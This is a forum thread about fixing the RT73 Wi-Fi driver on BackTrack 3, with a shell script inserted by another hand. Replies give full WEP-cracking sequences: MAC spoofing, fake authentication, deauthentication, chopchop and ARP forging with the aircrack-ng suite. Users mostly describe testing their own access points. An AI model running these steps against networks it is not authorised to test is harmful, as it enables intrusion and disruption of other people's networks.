BT3 final has a few minor issues with our driver that are fairly easy to circumvent and I wanted to share my solutions here. This is a collection of notes and ideas I have put together from my time here and first and foremost I want to thank the community because everything I'm putting here I found from various posts in these very forums.
I would also like to ask you to please remember this is a howto for the RaLink RT73 USB Enhanced Driver. Please keep the discussion in this post relevant and don't ask for support for mundane BT3 tasks.
Now let's begin. It's a good idea to grab a couple of things before we get started. The first thing you need to do is get the BT3 kernel sources (thank you shamanvirtuel for delivering me from my noobedness)
and after that you will need the previous version of the aspj driver. (SV yet again infinitely wise)
After you have what you need and you are in BT you can bring down your current interface and driver with
Code:
ifconfig rausb0 down
modprobe -r rt73
Then you wanna navigate to your folder with the kernel.lzm and type
Code:
lzm2dir kernel.lzm /
afterward you can go to the driver folder and
Code:
make
make install
now you can bring up the driver and interface with
Code:
modprobe rt73
ifconfig rausb0 up
At this point your wireless card is ready to be put to good use. Iwpriv commands and SpoonWep will now work gloriously! If you are looking to crack wep/wpa with our card use SpoonWep or look here for a tutorial on how to do it with the terminal, if you are looking to connect to a wep encrypted AP use wireless assistant, and if you are trying to connect to wpa/wpa2 use these commands.
Code:
ifconfig rausb0 up
iwconfig rausb0 mode managed
iwconfig rausb0 essid <Your SSID>
iwpriv rausb0 set AuthMode=WPAPSK     (or WPA2PSK if you are using WPA2) *WPA2PSK is for this line only
iwpriv rausb0 set WPAPSK=<Your Key>
iwpriv rausb0 set EncrypType=TKIP     (or AES)
dhcpcd rausb0
This has worked very well for me and I hope it works for you too. Good luck.
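As an added example (not part of the post above, and not the driver's own code), here is the same iwpriv WPA/WPA2-PSK sequence wrapped in a small POSIX sh script that validates the inputs and, instead of calling dhcpcd immediately, polls iwconfig until the card actually reports an associated access point. That distinction matters when troubleshooting: if the "Access Point:" field never leaves "Not-Associated", the problem is the key, AuthMode or EncrypType, not DHCP. The interface name rausb0, the iwpriv keys (AuthMode, WPAPSK, EncrypType) and the iwconfig output format ("Access Point: <MAC>" from wireless-tools) are assumptions taken from the post and from standard wireless-tools; the script name and the sample iwconfig text are made up for illustration.

```shell
#!/bin/sh
# Added example: scripted rt73 WPA/WPA2-PSK connect with an association check.
# Usage: sh rt73-wpa.sh <essid> <key> [WPAPSK|WPA2PSK] [TKIP|AES]
# Assumes the legacy rt73 driver and its rausb0 interface as in the post.

IFACE="${IFACE:-rausb0}"

# A WPA passphrase is 8..63 characters, or a 64-hex-digit raw PSK.
psk_valid() {
    key="$1"
    len=${#key}
    if [ "$len" -eq 64 ]; then
        case "$key" in
            *[!0-9A-Fa-f]*) return 1 ;;   # 64 chars must all be hex
        esac
        return 0
    fi
    [ "$len" -ge 8 ] && [ "$len" -le 63 ]
}

# Print the AP MAC from iwconfig output (passed as $1); fail if not associated.
assoc_bssid() {
    printf '%s\n' "$1" \
      | sed -n 's/.*Access Point: \([0-9A-Fa-f:]\{17\}\).*/\1/p' \
      | grep .
}

# Constructed sample iwconfig output (wireless-tools format), used for self-tests.
SAMPLE_ASSOC='rausb0    RT73 WLAN  ESSID:"lab"  Nickname:"rausb0"
          Mode:Managed  Frequency=2.437 GHz  Access Point: 00:11:22:33:44:55
          Bit Rate=54 Mb/s'
SAMPLE_NOASSOC='rausb0    RT73 WLAN  ESSID:""  Nickname:"rausb0"
          Mode:Managed  Frequency=2.437 GHz  Access Point: Not-Associated'

# Apply the post's iwpriv sequence, then wait for association before DHCP.
wpa_connect() {
    essid="$1"; key="$2"; auth="${3:-WPAPSK}"; enc="${4:-TKIP}"
    psk_valid "$key" || { echo "PSK must be 8-63 chars or 64 hex digits" >&2; return 2; }
    case "$auth" in WPAPSK|WPA2PSK) ;; *) echo "AuthMode must be WPAPSK or WPA2PSK" >&2; return 2 ;; esac
    case "$enc"  in TKIP|AES)       ;; *) echo "EncrypType must be TKIP or AES" >&2; return 2 ;; esac

    ifconfig "$IFACE" up
    iwconfig "$IFACE" mode managed
    iwconfig "$IFACE" essid "$essid"
    iwpriv "$IFACE" set AuthMode="$auth"
    iwpriv "$IFACE" set WPAPSK="$key"     # key is briefly visible in ps/shell history
    iwpriv "$IFACE" set EncrypType="$enc"

    # Poll up to 30 s for the driver to report an associated AP.
    i=0
    while [ "$i" -lt 30 ]; do
        if bssid=$(assoc_bssid "$(iwconfig "$IFACE" 2>/dev/null)"); then
            echo "associated with $bssid, requesting DHCP lease"
            dhcpcd "$IFACE"
            return $?
        fi
        sleep 1
        i=$((i + 1))
    done
    echo "no association after 30 s: check key, AuthMode and EncrypType" >&2
    return 1
}

# Only run when invoked with arguments, so the functions can be sourced/tested.
if [ $# -ge 2 ]; then
    wpa_connect "$@"
fi
```

Run it as root with `sh rt73-wpa.sh <essid> <key> WPA2PSK AES` for a WPA2/AES network; the iwpriv commands are issued in the same order as in the post.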
I too have the Edimax EW-7318USg and just like the OP said, it doesn't work out of the box. I also had to modprobe the adapter for it to work.
It doesn't bother me now, but out of curiosity can any of the devs explain the reason why the card doesn't work for BT3 Final? It works on BT3beta out of the box.
My problem is that I can't get the Edimax EW-7318USg to inject with BT3. I had no problem with BT2 and have searched this forum but most of what I find suggests that it should work out of the box or try:-
iwpriv rausb0 rfmontx 1
iwpriv rausb0 forceprism 1
iwconfig rausb0 mode monitor
Done this but when I try 'aireplay-ng -9 rausb0' against my AP it is a 100% failure, any suggestions would be appreciated.
Try this:
Code:
$ airmon-ng stop rausb0
$ ifconfig rausb0 down
$ macchanger --mac 00:11:22:33:44:55 rausb0
$ airmon-ng start rausb0
$ airodump-ng rausb0
# find the bssid and copy it
$ airodump-ng -c 1 -w output --bssid <bssid> rausb0
$ aireplay-ng -1 0 -a <bssid> -h 00:11:22:33:44:55 rausb0
$ aireplay-ng -0 5 -a <bssid> rausb0
$ aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0
# answer yes and wait
$ packetforge-ng --arp -a <bssid> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y filename.xor -w arprequest
$ aireplay-ng -2 -r arprequest rausb0
# say yes
$ aircrack-ng output-01.cap
speed999, the aircrack wiki for our driver (found here) says to try
Code:
iwconfig rausb0 rate 1M
good luck.
Tried this but 'aireplay-ng -1 0 -a <bssid> -h 00:11:22:33:44:55 rausb0' fails after 'Sending Authentication Request' with 'Attack was unsuccessful'. This is the same problem I have when using:-
airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0
aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0
aircrack-ng -b <bssid> capturefile*.ivs
I only get to attempting the fake authentication and it fails! No problem with the same attack using BT2.
Tried ‘iwconfig rausb0 rate 1M’
The fake authentication worked but 'aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0' failed 'the access point does not properly discard frames with an invalid ICV.....'
When I used:-
airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0
aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0
Brilliant and thanks it works!
As the attack I have used works on BT2, I don’t think I would have made the link between the Aircrack wiki and BT3 without your help. My knowledge of Unix is almost zero so could I ask another question. The pps looks a bit slow compared with BT2 so if I try increasing the rate from 1M what do you recommend the increments should be?
Thanks again for everyone’s help
Well I don't know what the increment should be, but if you increase it by 1dBi each time until it doesn't work; you will find your answer.
Code:
iwconfig rausb0 txpower 10
Then increase it by 1dBi each time:
Code:
iwconfig rausb0 txpower 11
Lucky for you anyway! All day I have been trying to inject my AP with my Edimax and I can't! LOL!
It gets worse, Back|Track does recognize my card, but I tried a LOT of tricks and it was hit and miss. It took me nearly 3 hours to connect to my AP as the card didn't see any APs at all! Then when I set my card into monitor mode to test out the funny EzPWN toolset just for a laugh...it didn't see any APs!
I exited EzPWN and loaded airodump-ng, it saw the APs. Then I stopped airodump-ng in order to define my AP in airodump and start injecting...nothing, it didn't even see any APs. I can not connect to the internet on BackTrack unless I load it, restart it, load it and restart it again. It's very frustrating because it was working perfectly for a while and now I have to hold off my BASE/Snort/With_Graphs tutorial as I'm in Windows as it's the only way I can connect to my AP.
In case anyone is wondering, yes I do have a built in Atheros but I am not in my computer room today and the ath0 is crap from my shed. Any help from anyone on this mysterious rt73 problem would be appreciated.
Okay, I am still in Windows [only way to surf at the moment] and I found this on the Aircrack-ng site:
"The instructions below reference an older version of the drivers than is available on ASPj's site. This is because the newer version contains some bugs. See the forum threads for details."
I am going to look into this as soon as I boot back into BT3f.
I am having strange issues with my card as well. Fortunately I have an Intel Pro Wireless one on a laptop so I have been using that to play around on.
First, with my Edimax 7318 I can crack wep/wpa just fine in the command line but I still have had absolutely zero success with SV's SpoonWep (works just fine on the laptop with the other card). SV had asked me to try installing the rt73-k2wrlz-2.0.1 driver but I have yet to try it.
Second, No matter what I try, I cannot connect to my AP with WPA2 encryption.
My previous working method for connecting with my card in BT is no longer working (see code below) and wireless assistant is fail.
Code:
ifconfig rausb0 up
iwconfig rausb0 mode managed
iwconfig rausb0 essid <Your SSID>
iwpriv rausb0 set AuthMode=WPAPSK     (or WPA2PSK if you are using WPA2)
iwpriv rausb0 set WPAPSK=<Your Key>
iwpriv rausb0 set EncrypType=TKIP     (or AES)
dhcpcd rausb0
My next step is to try the previous aspj driver, drop my encryption to wep, and see if I can connect/scan/exploit ok.
Please post your solutions Denv and I will post any I find as well. Thanks.
I will do, no sweat man. I'm on Windows at the moment using my Atheros card, it's nearly 5am and I have been awake for more or less 2 days trying to get BASE working. Not a problem, tomorrow I will troubleshoot my Edimax and post my results here. I also have zero success with Wireless Assistant and SpoonWep, of course CL was my first approach and it 'half' worked and hasn't worked since.